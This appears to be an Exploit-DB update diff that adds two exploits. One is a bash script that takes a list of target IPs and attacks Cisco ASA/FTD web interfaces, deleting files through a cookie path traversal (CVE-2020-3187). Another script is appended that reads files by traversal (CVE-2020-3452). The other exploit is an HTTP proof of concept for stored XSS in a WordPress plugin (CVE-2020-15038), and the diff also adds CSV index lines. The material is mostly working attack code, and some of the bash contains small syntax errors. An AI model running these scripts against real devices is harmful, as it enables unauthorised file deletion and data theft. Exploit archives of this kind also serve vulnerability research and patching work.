DB: 2020-07-30

2 changes to exploits/shellcodes

Cisco Adaptive Security Appliance Software 9.7 - Unauthenticated Arbitrary File Deletion
Wordpress Plugin Maintenance Mode by SeedProd 5.1.1 - Persistent Cross-Site Scripting

exploits/hardware/webapps/48723.sh

@@ -0,0 +1,189 @@
+# Exploit Title: Cisco Adaptive Security Appliance Software 9.7 - Unauthenticated Arbitrary File Deletion
+# Google Dork: inurl:/+CSCOE+/
+# Date: 2020-08-27
+# Exploit Author:  0xmmnbassel
+# Vendor Homepage: https://www.cisco.com/c/en/us/products/security/asa-firepower-services/index.html#~models
+# Version: Cisco ASA Software  >=9.14 except 9.11   Cisco FTD Software >=6.2.2 and 6.2.3,6.3.0,6.4.0,6.50,6.60
+# Vulnerability Type: unauthenticated file deletion
+# Version: Cisco ASA Software releases 9.5 and earlier, as well as
+# Release 9.7, have reached end of software maintenance. Customers are
+# advised to migrate to a supported release that includes the fix for
+# this vulnerability.
+# CVE : CVE-2020-3187
+
+#!/bin/bash
+
+delete="csco_logo.gif"
+
+
+helpFunction()
+{
+echo ""
+echo -e "\t\tCVE-2020-3187"
+echo ""
+echo "Usage: $0 -l targets.txt -d csco_logo.gif "
+echo -e "\t-l for list of IPs in text file"
+echo -e "\t-d file to be deleted, default: ./+CSCOE+/csco_logo.gif"
+echo -e "\t-i for single IP test"
+exit 1
+}
+
+while getopts "l:d:i:" opt
+do
+case "$opt" in
+l ) input="$OPTARG" ;;
+d ) delete="$OPTARG" ;;
+i ) website="$OPTARG" ;;
+? ) helpFunction ;;
+esac
+done
+
+
+#if $website is empty or $input is empty
+if [ -z "$website" ] && [ -z "$input" ]
+then
+echo "Some/all of the parameters are empty";
+helpFunction
+fi
+
+#usage
+
+if [ -z "$input"];
+then
+status=$(curl -LI $website/+CSCOU+/$delete -o /dev/null -w
+'%{http_code}\n' -s)
+echo "checking if $website has the $delete file"
+if [ $status -eq 200 ]; then
+echo "$website/+CSCOU+/$delete exists, deleting it..."
+curl -H "Cookie: token=..//+CSCOU+/$delete" -v -s -o
+resultsindv.txt $website/+CSCOE+/session_password.html
+delcheck=$(curl -LI $website/+CSCOU+/$delete -o /dev/null -w
+'%{http_code}\n' -s)
+if [ delcheck -eq 404]; then
+echo "Deleted!, $website is vulnerable to CVE-2020-3187."
+else
+echo "Cannot Delete $website/+CSCOU+/$delete file, check it manaully!"
+fi
+else
+echo "$website/+CSCOU+/$delete doesn't exist!"
+fi
+
+else
+while IFS= read -r line
+do
+echo "Checking $line if file $delete exist.."
+#echo $response
+status=$(curl -LI $line/+CSCOU+/$delete -o /dev/null -w
+'%{http_code}\n' -s)
+if [ $status -eq 200 ]; then
+echo "$line/+CSCOU+/$delete exists, deleting it..."
+curl -H "Cookie: token=..//+CSCOU+/$delete" -v -s -o
+results.txt $line/+CSCOE+/session_password.html
+
+#for no verbosity
+#curl -H "Cookie: token=..//+CSCOU+/$delete" -s -o
+results.txt $line/+CSCOE+/session_password.html
+delcheck=$(curl -LI $line/+CSCOU+/$delete -o /dev/null -w
+'%{http_code}\n' -s)
+if [ delcheck -eq 404]; then
+echo "Deleted!, $line is vulnerable to CVE-2020-3187."
+else
+echo "Cannot Delete $line/+CSCOU+/$delete file, check it manaully!"
+fi
+else
+echo "$line/+CSCOU+/$delete doesn't exist!"
+fi
+done < "$input"
+
+
+fi
+
+
+
+
+#!/bin/bash
+
+
+read="%2bCSCOE%2b/portal_inc.lua"
+
+
+helpFunction()
+{
+   echo ""
+   echo -e "\t\tCVE-2020-3452"
+   echo ""
+   echo "Usage: $0 -l targets.txt -r %2bCSCOE%2b/portal_inc.lua "
+   echo -e "\t-l for list of IPs in text file"
+   echo -e "\t-r file to read, default: %2bCSCOE%2b/portal_inc.lua"
+   echo -e "\t-i for single IP test"
+   exit 1
+}
+
+while getopts "l:r:i:" opt
+do
+   case "$opt" in
+      l ) input="$OPTARG" ;;
+      r ) read="$OPTARG" ;;
+      i ) website="$OPTARG" ;;
+      ? ) helpFunction ;;
+   esac
+done
+
+
+
+#if $website is empty or $input is empty
+if [  -z "$website"  ] && [ -z "$input" ]
+then
+   echo "Some/all of the parameters are empty";
+   helpFunction
+fi
+
+#usage
+
+
+if [ -z "$website"];
+  then
+  while IFS= read -r line
+  do
+    name=$(echo $line | cut -c9-19)
+    #echo "testing $line"
+    filename="$name.txt"
+      #echo $response
+      status=$(curl -LI  $line"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name="$read  -o /dev/null   -w '%{http_code}\n' -s)
+
+      if [ $status -eq "400" ]; then
+        echo "$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!"
+      else
+        wget  "$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read" -O $name.txt
+
+        if [ -s $filename ]; then
+          echo "$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read..."
+            echo "downloaded!, $line is vulnerable to CVE-2020-3452."
+
+        else
+          echo "not vulnerable!"
+          rm -rf $filename
+        fi
+      fi
+    done < "$input"
+  else
+
+  name=$(echo $website | cut -c9-16)
+  filename="$name.txt"
+
+  status=$(curl -LI  $website"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name="$read  -o /dev/null   -w '%{http_code}\n' -s)
+  if [ $status -eq "Bad Request" ]; then
+    echo "$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!"
+  else
+
+    echo "$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read..."
+    wget  "$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read" -O $name.txt
+    if [ -s $filename ]; then
+      echo "downloaded!, $website is vulnerable to CVE-2020-3452."
+    else
+      echo "not vulnerable!"
+      rm -rf $filename
+    fi
+  fi
+
+fi

exploits/php/webapps/48724.txt

@@ -0,0 +1,36 @@
+# Exploit Title: Wordpress Plugin Maintenance Mode by SeedProd 5.1.1 - Persistent Cross-Site Scripting
+# Date: 2020-06-22
+# Vendor Homepage: https://www.seedprod.com/
+# Vendor Changelog: https://wordpress.org/plugins/coming-soon/#developers
+# Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec)
+# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/stored-xss-coming-soon-page-maintenance-mode-plugin/
+# Author Homepage: https://www.jinsonvarghese.com
+# Version: 5.1.1 and below
+# CVE : CVE-2020-15038
+
+1. Description
+
+Coming Soon Page, Under Construction & Maintenance Mode by SeedProd is a popular WordPress Plugin with over 1 million active installations. The Headline field under the Page Settings section along with other fields in the plugin settings were found to be vulnerable to stored XSS, which gets triggered when the Coming Soon page is displayed (both in preview mode and live). All WordPress websites using Coming Soon Page, Under Construction & Maintenance Mode by SeedProd version 5.1.1 and below are affected.
+
+2. Proof of Concept
+
+POST /wp-admin/options.php HTTP/1.1
+Host: localhost:10004
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost:10004/wp-admin/admin.php?page=seed_csp4
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 636
+Origin: http://localhost:10004
+Connection: close
+Cookie: wordpress_7f1e0e8dff8818d1c2f579415daff8c7=jinson%7C1593950372%7C4GRNHaGPf0Fgg4gDEpeoNwijwEWzc3D3eVOlrvXniBi%7Cb9d2e047395f59871a0900e390bbd3d695bc5da3afb334da3d0ef5e8bf0c2f1b; wordpress_a024acb662ffd2f30d002a94ed1ea95c=jinson%7C1592914794%7CCgXYWBOtHL4ad8HOoBAQX49z08S9twTuGYVtVWqIbFp%7C01f69b63f0019268e8a42d1cefd95cd451b8ae990337af407b1caf9cb3fa99e5; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_7f1e0e8dff8818d1c2f579415daff8c7=jinson%7C1593950372%7C4GRNHaGPf0Fgg4gDEpeoNwijwEWzc3D3eVOlrvXniBi%7Cf1c8b238e06829673fea45a383730caae8b84cd0ac08b6f11fee65cd94cb8c16; PHPSESSID=44b22ef78b270abbd2351f1d858edb02; wordpress_logged_in_a024acb662ffd2f30d002a94ed1ea95c=jinson%7C1592914794%7CCgXYWBOtHL4ad8HOoBAQX49z08S9twTuGYVtVWqIbFp%7C317cd515fad907c4ae323798cca357f601c29999b20edbe8f9fdad02f35c53f7; wp-settings-time-1=1592745227; cookielawinfo-checkbox-non-necessary=yes; wp-settings-1=imgsize%3Dfull; cookielawinfo-checkbox-necessary=yes
+Upgrade-Insecure-Requests: 1
+
+option_page=seed_csp4_settings_content&action=update&_wpnonce=faced0b8ff&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dseed_csp4&seed_csp4_settings_content%5Bstatus%5D=1&seed_csp4_settings_content%5Blogo%5D=&seed_csp4_settings_content%5Bheadline%5D=%3Cscript%3Ealert%28%22Stored+XSS+in+Page+Headline%22%29%3C%2Fscript%3E&seed_csp4_settings_content%5Bdescription%5D=Proof+of+Concept&seed_csp4_settings_content%5Bfooter_credit%5D=0&submit=Save+All+Changes&seed_csp4_settings_content%5Bfavicon%5D=&seed_csp4_settings_content%5Bseo_title%5D=&seed_csp4_settings_content%5Bseo_description%5D=&seed_csp4_settings_content%5Bga_analytics%5D=
+
+3. Timeline
+
+Vulnerability reported to the SeedProd team – June 22, 2020
+Version 5.1.2 containing the fix to the vulnerability released – June 24, 2020

files_exploits.csv

@@ -42965,3 +42965,5 @@ id,file,description,date,author,type,platform,port
 48716,exploits/ruby/webapps/48716.rb,"Rails 5.0.1 - Remote Code Execution",2020-07-26,"Lucas Amorim",webapps,ruby,
 48720,exploits/php/webapps/48720.py,"eGroupWare 1.14 - 'spellchecker.php' Remote Command Execution",2020-07-27,"Berk KIRAS",webapps,php,
 48722,exploits/hardware/webapps/48722.txt,"Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion",2020-07-28,0xmmnbassel,webapps,hardware,
+48723,exploits/hardware/webapps/48723.sh,"Cisco Adaptive Security Appliance Software 9.7 - Unauthenticated Arbitrary File Deletion",2020-07-29,0xmmnbassel,webapps,hardware,
+48724,exploits/php/webapps/48724.txt,"Wordpress Plugin Maintenance Mode by SeedProd 5.1.1 - Persistent Cross-Site Scripting",2020-07-29,"Jinson Varghese Behanan",webapps,php,